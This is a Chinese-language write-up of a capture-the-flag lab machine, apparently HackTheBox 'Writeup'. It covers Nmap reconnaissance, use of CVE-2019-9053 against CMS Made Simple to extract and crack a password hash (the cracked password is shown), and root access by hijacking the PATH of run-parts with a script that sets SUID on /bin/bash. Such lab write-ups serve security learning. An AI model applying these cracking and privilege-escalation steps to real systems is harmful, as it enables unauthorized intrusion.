本文介绍了如何在Linux环境中利用CVE-2019-9053漏洞进行渗透测试。首先,通过Nmap扫描获取目标主机的信息,包括开放的SSH和HTTP端口。接着,通过访问Web界面和robots.txt文件发现了使用的CMS。利用漏洞获取用户凭据后,成功通过SSH登录。随后,通过检查权限,发现可以利用路径劫持进行特权升级,最终获得root权限。最后,总结了在此过程中学到的经验教训。
Information Gathering
# Nmap 7.98 scan initiated Mon Dec 29 13:52:07 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 4.19 (90%), Linux 5.0 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 5.379 days (since Wed Dec 24 04:47:57 2025)
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 29 13:53:46 2025 -- 1 IP address (1 host up) scanned in 99.57 secondsVulnerability Analysis
访问web得到,随后查看robots.txt最后进入http://writeup.htb/writeup/发现使用的是CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.搜索CMS Made Simple 2019得到CVE-2019-9053
Exploitation (User Flag)
运行后得到
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
➜ Writeup echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
->raykayjay9ssh jkr@writeup.htb输入raykayjay9即可
Privilege Escalation (Root Flag)
jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)staff组,代表对/usr/local 有所有权限
jkr@writeup:~$ ls -ld /usr/local/bin
drwx-wsr-x 2 root staff 20480 Apr 19 2019 /usr/local/bin运行pspy
# 刚开始我没什么发现,但是当我们ssh到目标是可以看到
2025/12/31 01:34:45 CMD: UID=0 PID=2265 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2025/12/31 01:34:45 CMD: UID=0 PID=2266 | run-parts --lsbsysinit /etc/update-motd.d从PATH中寻找run-parts运行,所以可以路径劫持
jkr@writeup:~$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
jkr@writeup:~$ ls -la /usr/local/bin/run-parts
-rwxr-xr-x 1 jkr staff 33 Dec 31 01:39 /usr/local/bin/run-parts
jkr@writeup:~$ ls -ld /bin/bash
-rwxr-xr-x 1 root root 1099016 May 15 2017 /bin/bash现在重新连接目标,触发我们的payload
➜ Writeup ssh jkr@writeup.htb
jkr@writeup.htb's password:
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 31 01:34:46 2025 from 10.10.16.3
-bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1099016 May 15 2017 /bin/bash-bash-4.4$ /bin/bash -p
bash-4.4# id
uid=1000(jkr) gid=1000(jkr) euid=0(root) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)